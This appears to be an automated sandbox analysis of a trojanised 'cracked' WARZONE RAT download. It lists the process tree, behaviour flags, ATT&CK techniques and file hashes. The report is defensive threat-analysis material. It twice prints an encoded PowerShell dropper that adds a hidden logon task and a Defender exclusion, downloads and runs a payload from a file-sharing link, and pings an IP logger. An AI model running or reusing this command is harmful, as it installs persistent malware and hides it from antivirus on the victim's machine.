    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
    3⤵
    PID:4388
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6908 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2340
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6212 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
    3⤵
    PID:4616
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
    3⤵
    PID:2776
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7244 /prefetch:1
    3⤵
    PID:1704
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
    3⤵
    PID:2120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
    3⤵
    PID:4528
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7100 /prefetch:1
    3⤵
    PID:3548
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
    3⤵
    PID:3660
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=936 /prefetch:1
    3⤵
    PID:2060
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:1
    3⤵
    PID:392
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
    3⤵
    PID:4576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
    3⤵
    PID:1096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7716 /prefetch:1
    3⤵
    PID:2000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1
    3⤵
    PID:3844
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\WARZONERAT3.03\" -spe -an -ai#7zMap8153:90:7zEvent24230
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4356
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\WARZONERAT3.03\PASSWORD.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4344
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\WARZONERAT3.03\" -an -ai#7zMap25593:122:7zEvent31954
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2480
- C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe
  "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Modifies registry class
  PID:3864
- - C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe
    "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3596
- C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe
  "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:5104
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8F75.tmp\8F76.bat "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe""
    3⤵
    PID:1296
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwANAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAkAGUAbgB2ADoAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABNAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQANAAoAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcAbwBuACAADQAKACQAdABhAHMAawBwAGEAdABoACAAPQAgACIATQBhAGkAbgB0AGUAbgBhAG4AYwBlACAAUwBlAHQAdABpAG4AZwBzACAAQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbAAiAA0ACgBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBhAGkAbgB0AGUAbgBhAG4AYwBlACAAUwBlAHQAdABpAG4AZwBzACAAQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbAAiACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAHQAYQBzAGsAcABhAHQAaAAgAC0ARgBvAHIAYwBlAA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcAG0AaQBjAHIAbwBzAG8AZgB0AFwATQBhAGkAbgB0AGUAbgBhAG4AYwBlAC4AZQB4AGUAIAAtAEYAbwByAGMAZQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAANAANAAoAJABzAG8AdQByAGMAZQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBkAHIAaQB2AGUALgBsAGkAdgBlAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQAPwBjAGkAZAA9AEMANwBGADAANQAwAEEAQgBBADYARAAwAEYANgBCADcAJgByAGUAcwBpAGQAPQBDADcARgAwADUAMABBAEIAQQA2AEQAMABGADYAQgA3ACUAMgAxADEAMAA1ACYAYQB1AHQAaABrAGUAeQA9AEEASQBQAFkAYQBtAHMAZAAzADgAYwBsAEYAVgBzACIADQAKACQAZABlAHMAdAAgAD0AIAAiACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACIAIAANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcwBvAHUAcgBjAGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGQAZQBzAHQADQAKACQARgBJAEwARQA9AEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACAALQBGAG8AcgBjAGUADQAKACQARgBJAEwARQAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAFIAZQBhAGQATwBuAGwAeQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAA0ACgAkAEEAYwBsACAAPQAgAEcAZQB0AC0AQQBjAGwAIAAiACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACIADQAKACQAQQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAgAHMAeQBzAHQAZQBtAC4AcwBlAGMAdQByAGkAdAB5AC4AYQBjAGMAZQBzAHMAYwBvAG4AdAByAG8AbAAuAGYAaQBsAGUAcwB5AHMAdABlAG0AYQBjAGMAZQBzAHMAcgB1AGwAZQAoACIARQB2AGUAcgB5AG8AbgBlACIALAAiAFcAcgBpAHQAZQAiACwAIgBEAGUAbgB5ACIAKQANAAoAJABBAGMAbAAuAFMAZQB0AEEAYwBjAGUAcwBzAFIAdQBsAGUAKAAkAEEAcgApAA0ACgBTAGUAdAAtAEEAYwBsACAAIgAkAGUAbgB2ADoAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABNAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAiACAAJABBAGMAbAANAAoAcwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlAA0ACgB3AGcAZQB0ACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgBBAGQAMgBSADcADQAKAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEUAeABpAHQAKAAxACkAIAA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3264
- C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe
  "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  PID:2536
- C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe
  "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1264
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7744.tmp\7745.bat "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe""
    3⤵
    PID:1968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwANAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAkAGUAbgB2ADoAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABNAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQANAAoAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcAbwBuACAADQAKACQAdABhAHMAawBwAGEAdABoACAAPQAgACIATQBhAGkAbgB0AGUAbgBhAG4AYwBlACAAUwBlAHQAdABpAG4AZwBzACAAQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbAAiAA0ACgBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBhAGkAbgB0AGUAbgBhAG4AYwBlACAAUwBlAHQAdABpAG4AZwBzACAAQwBvAG4AdAByAG8AbAAgAFAAYQBuAGUAbAAiACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAHQAYQBzAGsAcABhAHQAaAAgAC0ARgBvAHIAYwBlAA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcAG0AaQBjAHIAbwBzAG8AZgB0AFwATQBhAGkAbgB0AGUAbgBhAG4AYwBlAC4AZQB4AGUAIAAtAEYAbwByAGMAZQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAANAANAAoAJABzAG8AdQByAGMAZQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBkAHIAaQB2AGUALgBsAGkAdgBlAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQAPwBjAGkAZAA9AEMANwBGADAANQAwAEEAQgBBADYARAAwAEYANgBCADcAJgByAGUAcwBpAGQAPQBDADcARgAwADUAMABBAEIAQQA2AEQAMABGADYAQgA3ACUAMgAxADEAMAA1ACYAYQB1AHQAaABrAGUAeQA9AEEASQBQAFkAYQBtAHMAZAAzADgAYwBsAEYAVgBzACIADQAKACQAZABlAHMAdAAgAD0AIAAiACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACIAIAANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcwBvAHUAcgBjAGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGQAZQBzAHQADQAKACQARgBJAEwARQA9AEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACAALQBGAG8AcgBjAGUADQAKACQARgBJAEwARQAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAFIAZQBhAGQATwBuAGwAeQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAA0ACgAkAEEAYwBsACAAPQAgAEcAZQB0AC0AQQBjAGwAIAAiACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlACIADQAKACQAQQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAgAHMAeQBzAHQAZQBtAC4AcwBlAGMAdQByAGkAdAB5AC4AYQBjAGMAZQBzAHMAYwBvAG4AdAByAG8AbAAuAGYAaQBsAGUAcwB5AHMAdABlAG0AYQBjAGMAZQBzAHMAcgB1AGwAZQAoACIARQB2AGUAcgB5AG8AbgBlACIALAAiAFcAcgBpAHQAZQAiACwAIgBEAGUAbgB5ACIAKQANAAoAJABBAGMAbAAuAFMAZQB0AEEAYwBjAGUAcwBzAFIAdQBsAGUAKAAkAEEAcgApAA0ACgBTAGUAdAAtAEEAYwBsACAAIgAkAGUAbgB2ADoAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABNAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAiACAAJABBAGMAbAANAAoAcwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABtAGkAYwByAG8AcwBvAGYAdABcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGUAeABlAA0ACgB3AGcAZQB0ACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgBBAGQAMgBSADcADQAKAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEUAeABpAHQAKAAxACkAIAA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      PID:2076
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3824

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1884

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2980

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x4f4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2896

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WARZONE-RAT 3.03 Cracked.exe.log

Filesize
859B

MD5
6ac788b37bd66f864d1c55570224421e

SHA1
019a045033189b462ba360eb695f28432cad2031

SHA256
fca59707e0e135a8bbe1281934e3af9b21147b29c0219cd3966d14e53b9d58d1

SHA512
25ed770f024d957e7b01eb8acfe6f4e68127410ff3085a22ec85e4bd091ad8ac1a69e484d11a02bc3d0631b156945d5df32c1ded861fb9603f76533fd0b6b2dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
960717c9bbc5b8ff88c27fb2f6f04656

SHA1
c70c3138c0433aeab64c8aeff67b3622ab1ba6f0

SHA256
d590e995a7e689fbf387f3f917863a37460b99b32f8c0dcb9fb2389f3d8af5e8

SHA512
9e86e38e4af549d5407c1a03b609747eeff66a76cddee9caeb7b94f606d879c2b5bd05d596d67437229cf5902fd840016c7d4e3b59047b1f3bd030efecb61ef9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8114c8477a121c9aa4f577ebe753f277

SHA1
379db86efc023e0caf2cc4219edc6a7893bca450

SHA256
90550a45ff1e8b1f718ffcda740d3701bde2c12ffa9b163ab712632134d1bd3a

SHA512
76bfa7fe925a6965a95caf8a7cc33ca2e1360cc4ebb60209aa3beef668fbe2e7e8d083c9231319f79db0f9c86c131af0c302a176afd13262ca51db72528c4e55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
528B

MD5
55f6fbc6490266a883707b1d207b3ff0

SHA1
61d6abf2b5ce1217335d43acfc2ee68a8fb01d6a

SHA256
4a81d260a3bd5d6f2d43c35f52a2465ee8e14539684170731877beac51c78442

SHA512
42b70e9610d7597820bb10e4842010b3d00094599ae3b6cddbcda2719f9ccfb75d55caab2c5000c4b954ba1c23befb126c8da1f4c6f26373c640ccea104be41e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
425d2a360de59b3912f80160bb8c0c01

SHA1
b658a26c36e2fa153435f81afc483da41d27fa2e

SHA256
044872728783a1669f9a49f982bc4e47a2963d1837fa04fcae2ce0876c552d41

SHA512
d320c26fd2cccd0dbd67fa20616524b1434968ed79fd971e77bbe6bd884181d44c5151fb0a3a753bbffd0f6f99b033e59f88c19dd5ce65e4a51e198909e71590

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
240B

MD5
959e55441b4a996c6592fc971ab8cf4a

SHA1
934be8a7fb593c76d8289f40119fa8c25e4076ec

SHA256
e55f7676d6a015909999e1c98ed7d3cd7230df281ad429c385c961ea648c5b2c

SHA512
bc3d6fe113324bf2872e2c99e17754a9b1db19abe4db6aade5b98664380ddba853d3b11c99b1e7bfc98f92e2d6dab8128a9d1a9603efdada66bbf4a9e26e8731

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\Origins\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_whatismyipaddress.com_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
